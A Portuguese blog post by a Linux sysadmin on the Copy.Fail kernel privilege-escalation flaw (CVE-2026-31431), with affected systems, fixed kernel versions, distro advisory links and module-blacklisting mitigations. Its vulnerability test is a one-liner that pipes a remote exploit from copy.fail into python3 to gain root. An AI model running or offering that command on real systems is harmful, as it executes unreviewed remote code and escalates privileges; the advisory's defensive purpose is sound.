Copy.Fail
O que sabemos
Todos os kernels linux de 2017 até 2026, antes da versão 7.0 estão com essa vulnerabilidade.
Em resumo, do resumo, do resumo, entenda que com um usuário normal no linux você consegue – via exploit – virar root com um comando de uma linha.
Desde 2003 usando Linux eu nunca tinha visto algo assim.
O site com os detalhes:
O que ele afeta?
- Um usuario normal pode virar root
- Um container comprometido pode escapar para o host (até no k8s)
- Um job malicioso de CI pode conseguir root no host runner
- Usuários em infra compartilhada podem virar root
- Injetar código via usuário www-data/apache para conseguir root
Ele é sensível especialmente em:
- Cluster Kubernetes clusters
- Ambientes CI/CD systems
- Ambientes Linux compartilhados
- Plataformas Cloud Single ou Multi-Tenant
Além do servidor onde mais afeta?
- Sistema operacional Android e variantes
- Sistema operacional WebOS
- Quaisquer embarcados que rodem o kernel Linux
- Quaisquer sistemas que rodem em cima do kernel linux
Ou seja vai de servidor, a celular, tv, relógio e embarcados.
Aprofundando
Em breve, equanto isso leia https://copy.fail.
Tem algum kernel seguro?
A partir das versões abaixo o uso é seguro
=> 5.10.254 through 5.10.*
=> 5.15.204 through 5.15.*
=> 6.1.170 through 6.1.*
=> 6.6.137 through 6.6.*
=> 6.12.85 through 6.12.*
=> 6.18.22 through 6.18.*
=> 6.19.12 through 6.19.*
=> 7.0
Já tem correções das distros?
O kernel já havia corrigido quando divulgaram, mas as distros não foram avisadas.
Infelizmente os pesquisadores só avisaram o projeto kernel. Eles até esperaram eles corrigirem e lançarem novas versões, mas não avisaram os times dev das distros, e isso gerou um caos danado desde a última quinta-feira.
É prática esperar as distros principais publicarem correções antes de soltar a falha e especialmente o exploit.
As distros estão trabalhando na correção, algumas já lançaram, outras estão terminando os pacotes.
Assim que souber algo de Debian/Ubuntu/Suse/Redhat eu aviso aqui e coloco os links para checar dados do CVE e correções.
Esse post será atualizado constantemente, volte para ver as novidades.
Como testar se estamos vulneravéis?
Basta rodar a linha de comando abaixo:
$ curl https://copy.fail/exp | python3 && su
# id
uid=0(root) gid=1002(user) groups=1002(user)
Dá medo, frio na barriga, mas acontece mesmo.
Como contornar o problema?
Forma simples e rápida
Rode isso tem todos os nós linux que você tem, use sua automação.
echo "install algif_aead /bin/false" > /etc/modprobe.d/disable-algif.conf
E remova o módulo caso esteja carregado
rmmod algif_aead 2>/dev/null || true
Isso já vai bloquear o principal módulo do kernel que permite a falha e descarregar o módulo caso esteja carregado.
Começe pelas máquinas que você tem IP Público e acesso SSH, depois comece a mitigar as máquinas com IP Privado da rede interna.
Priorize primeiro as máquinas que usuários normais tem acesso ssh/bash no sistema, aqui o perigo é real e certo.
Bloqueando todos os módulos algif
Para bloquear todos os módulos da família algif, crie o arquivo abaixo:
$ vim /etc/modprobe.d/blacklist-crypto-user-api.conf
Insira o conteúdo
blacklist af_alg
blacklist algif_hash
blacklist algif_skcipher
blacklist algif_rng
blacklist algif_aead
install af_alg /bin/false
install algif_hash /bin/false
install algif_skcipher /bin/false
install algif_rng /bin/false
install algif_aead /bin/false
Reconstrua o initrd
$ update-initramfs -u
$ reboot (se possível for)
Mesmo se não puder rebootar, no próximo boot seu kernel já estará protegido.
Protegendo seu boot
Aqui vamos bloquear o carregamento dos módulos no processo de boot, via grub, atuando em outra camada do sistema.
vim /etc/default/grub
ajuste a linha GRUBCMDLINELINUXDEFAULT adicionando essa parte de moduleblacklist
GRUB_CMDLINE_LINUX_DEFAULT="module_blacklist=bnxt_re
,rndis_host,af_alg,algif_hash,algif_skcipher,algif_rng,algif_aead"
atualize a configuraçao do grub
update-grub
reboot (se possível)
Mesmo se não puder rebootar, no próximo boot esses módulos não serão carregados por padrão.
Afeta Containers e Kubernetes?
Pode afetar, aqui um exemplo que você pode testar em seu cluster.
Entre em todos os nodes de todos os seus clusters K8S e faça a mitigação até que os pacotes atualizados do kernel e dependências sejam disponibilizados.
Harvester
Se voce usa Harvester/RKE/Kubevirt para virtualização, veja a documentação de como mitigar.
Amarrando as pontas
Acompanhe o site da sua distro para novidades.
Mantenha seus pacotes atualizados, especialmente o kernel.
Acompanhe as comunidades de sec sobre o problema.
Use sua automação para ganhar tempo na correção.
Links sobre o CopyFail em cada distro
Debian
Ubuntu
- https://ubuntu.com/blog/copy-fail-vulnerability-fixes-available
- https://ubuntu.com/security/CVE-2026-31431
Alma
- https://almalinux.org/blog/2026-05-01-cve-2026-31431-copy-fail
- https://errata.almalinux.org/8/ALSA-2026-A001.html
- https://errata.almalinux.org/9/ALSA-2026-A002.html
- https://errata.almalinux.org/10/ALSA-2026-A003.html
Rocky
RedHat
Suse
- https://www.suse.com/c/suse-responds-to-the-copy-fail-vulnerability/
- https://www.suse.com/security/cve/CVE-2026-31431.html
- https://www.suse.com/c/addressing-copy-fail-in-suse-virtualization/
ArchLinux
Outras referências
- https://www.cve.org/CVERecord?id=CVE-2026-31431
- https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2026-31431
- https://nvd.nist.gov/vuln/detail/CVE-2026-31431
- https://cert.europa.eu/publications/security-advisories/2026-005/
- https://github.com/advisories/GHSA-2274-3hgr-wxv6
[s] Guto
Gostou do conteúdo?
Você também me encontra nessas redes!
Mastodon
PixelFed
Lemmy
WriteFreely
@gutocarvalho@bolha.blog @notamental@bolha.blog @poesias@bolha.blog @contos@bolha.blog
Bookwyrm
Peertube
Friendica
Quer saber mais sobre mim?
Visite meus sites!
E meus blogs:
- https://blogs.gutocarvalho.net
- https://blogs.gutocarvalho.net/falagutera
- https://blogs.gutocarvalho.net/infra
- https://blogs.gutocarvalho.net/opiniao
- https://blogs.gutocarvalho.net/contos
- https://blogs.gutocarvalho.net/poesias
- https://blogs.gutocarvalho.net/lives
- https://blogs.gutocarvalho.net/orixas
- https://blogs.gutocarvalho.net/archives
Conhece o Coletivo Bolha?
Então vem conhecer o bolha.io ou bolhaverso!
- fediverso
- mastodon, https://bolha.us
- pixelfed, https://bolha.photos
- lemmy, https://bolha.forum
- bookwyrnm, https://bolha.review
- writefreely, https://bolha.blog
- peertube, https://bolha.tube
- castopod, https://bolha.studio
- owncast, https://bolha.stream
- friendica, https://bolha.network
- chat
- mattermost, https://mattermost.bolha.chat
- zulip, https://zulip.bolha.chat
- vídeo
- jitsi, https://bolha.video
- jitsi, https://bolha.video
- frontends
- lingva, https://translate.bolha.tools
- libremdb, https://libremdb.bolha.tools
- translations
- libretranslate, https://libretranslate.bolha.tools
- editors
- hedgedoc, https://notes.bolha.tools
- draw.io, https://draw.bolha.tools
- excalidraw, https://excalidraw.bolha.tools
- pdf stirling, https://spdf.bolha.tools
- wisemaping, https://mindmap.bolha.tools
- mermaid, https://mermaid.bolha.tools
- cryptpad, https://cryptad.bolha.tools
- secrets sharing
- yopass, https://yopass.bolha.tools
- password pusher, https://pusher.bolha.tools
- pastbin
- yabin, https://yabin.bolha.tools
- terminal recorder
- ascinnema, https://ascinemma.bolha.tools
- anti paywall
- 13ft, https://open.bolha.tools
Nós temos muito mais para compartilhar contigo!
Quer apoiar nosso trabalho? Você pode!
- https://www.patreon.com/bolha
- https://apoia.se/bolha
- pix@bolha.us
Te vejo no mastodon da bolha.us!
[s]